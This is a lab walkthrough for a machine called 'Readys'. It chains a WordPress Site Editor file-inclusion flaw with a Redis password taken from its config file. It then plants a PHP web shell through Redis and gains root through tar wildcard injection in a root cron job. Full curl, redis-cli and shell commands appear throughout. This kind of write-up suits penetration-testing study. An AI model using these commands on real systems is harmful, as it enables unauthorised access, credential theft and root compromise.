Machine Information
- Machine Name: Readys
- Machine Difficulty: intermediate
Information Gathering
Classic nmap time
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
Nmap scan report for 192.168.185.166
Host is up, received user-set (0.017s latency).
Scanned at 2024-10-27 11:46:13 +08 for 46s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGGcX/x/M6J7Y0V8EeUt0FqceuxieEOe2fUH2RsY3XiSxByQWNQi+XSrFElrfjdR2sgnauIWWhWibfD+kTmSP5gkFcaoSsLtgfMP/2G8yuxPSev+9o1N18gZchJneakItNTaz1ltG1W//qJPZDHmkDneyv798f9ZdXBzidtR5/+2ArZd64bldUxx0irH0lNcf+ICuVlhOZyXGvSx/ceMCRozZrW2JQU+WLvs49gC78zZgvN+wrAZ/3s8gKPOIPobN3ObVSkZ+zngt0Xg/Zl11LLAbyWX7TupAt6lTYOvCSwNVZURyB1dDdjlMAXqT/Ncr4LbP+tvsiI1BKlqxx4I2r
| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCpAb2jUKovAahxmPX9l95Pq9YWgXfIgDJw0obIpOjOkdP3b0ukm/mrTNgX2lg1mQBMlS3lzmQmxeyHGg9+xuJA=
| 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIE0omUJRIaMtPNYa4CKBC+XUzVyZsJ1QwsksjpA/6Ml+
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.7.2
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Readys – Just another WordPress site
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
6379/tcp open redis syn-ack ttl 61 Redis key-value store
I usually started with web port.
Port 80
According to nmap, it’s a wordpress. I then try to use wpscan to get some juicy information.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
wpscan --url http://192.168.185.166/ -e p
...
[i] Plugin(s) Identified:
[+] site-editor
| Location: http://192.168.185.166/wp-content/plugins/site-editor/
| Latest Version: 1.1.1 (up to date)
| Last Updated: 2017-05-02T23:34:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.1.1 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.185.166/wp-content/plugins/site-editor/readme.txt
...
I found some plugin in wordpress. I then check if this plugin has any existing exploit.
1
2
3
4
5
6
7
8
9
searchsploit wordpress plugin site editor
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin Site Editor 1.1.1 - Local File Inclusion | php/webapps/44340.txt
WordPress Plugin User Role Editor 3.12 - Cross-Site Request Forgery | php/webapps/25721.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
According to the result, the plugin is vulnerable to local file inclusion. I then try to replicate and see how it works.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
curl 'http://192.168.185.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
redis:x:107:114::/var/lib/redis:/usr/sbin/nologin
alice:x:1000:1000::/home/alice:/bin/bash
{"success":true,"data":{"output":[]}}
Since I have LFI, I looked into some interesting files and found some useful information.
1
2
curl -s 'http://192.168.185.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/redis/redis.conf' | grep -v '#' | grep pass
requirepass Ready4Redis?
I found a password in /etc/redis/redis.conf. I then realized it’s time to check on Redis port.
Port 6379
1
2
3
4
5
6
7
8
9
redis-cli -h 192.168.185.166
192.168.185.166:6379> info
NOAUTH Authentication required.
192.168.185.166:6379> auth Ready4Redis?
OK
192.168.185.166:6379> info
# Server
redis_version:5.0.14
...
After playing around with redis, I manage to use the credential and login as well as getting the version of redis. I then tried to explore the functionality of the redis. According to this, I could try to write malicious php code into the system and perform RCE from the web.
1
2
3
4
5
6
7
8
192.168.185.166:6379> config set dir /var/www/html
OK
192.168.185.166:6379> config set dbfilename test.php
OK
192.168.185.166:6379> set test "<?php phpinfo(); ?>"
OK
192.168.185.166:6379> save
(error) ERR
I tried with /var/www/html as that’s the default location for most of the web direcotry. Since I have local file inclusion vulnerability, I could just save the file at anywhere and use the vulnerability to search my vulnerable php file.
1
2
3
4
5
6
7
8
192.168.185.166:6379> config set dir /dev/shm
OK
192.168.185.166:6379> config set dbfilename test.php
OK
192.168.185.166:6379> set test "<?php system($_GET[0]); ?>"
OK
192.168.185.166:6379> save
OK
Now that I have save the file into /dev/shm direcotry, I try to access it using the LFI that I have.
1
2
3
4
5
curl -s 'http://192.168.185.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/dev/shm/test.php&0=id' --output -
REDIS0009 redis-ver5.0.14
redis-bits@ctimeused-mem
aof-preambletestuid=1000(alice) gid=1000(alice) groups=1000(alice)
DN($+{"success":true,"data":{"output":[]}}
Althought the output is weird, I could still execute command. Now that I could execute command, time to get reverse shell.
1
2
3
4
nc -nvlp 1234
alice@readys:/var/www/html/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes$ whoami
alice
Now that I have shell but not root, time to privilege escalation.
Privilege Escalation
I usually start by running linpeas.sh since this is a linux machine.
1
2
3
4
5
6
7
8
9
10
alice@readys:/etc$ cat crontab
*/3 * * * * root /usr/local/bin/backup.sh
alice@readys:/etc$ cat /usr/local/bin/backup.sh
#!/bin/bash
cd /var/www/html
if [ $(find . -type f -mmin -3 | wc -l) -gt 0 ]; then
tar -cf /opt/backups/website.tar *
fi
It seems like another tar privilege escalation. According to this, it is possible to get another shell with the help of --checkpoint=1 and --checkpoint-action=exec=/bin/sh. Since there’s a wildcard, *, in the tar command, I could just provide the argument as filename required.
1
2
3
4
5
alice@readys:/var/www/html$ echo '' > --checkpoint=1
alice@readys:/var/www/html$ echo '' > '--checkpoint-action=exec=bash test.sh'
alice@readys:/var/www/html$ vim test.sh
alice@readys:/var/www/html$ cat test.sh
chmod +s /bin/bash
I added the required argument as filename in /var/www/html because the script will go to the directory first when running the tar command. As for the test.sh, I used it to execute command to make sure it works. After waiting for awhile, the /bin/bash has added the SUID bit which means I could just get root shell now.
1
2
3
4
5
alice@readys:/var/www/html$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
alice@readys:/var/www/html$ /bin/bash -p
bash-5.0# whoami
root
Things I learned from this machine
- LFI to RCE with the help of redis
- redis could write file into certain places
- check redis config file for getting redis password
- tar wildcard privesc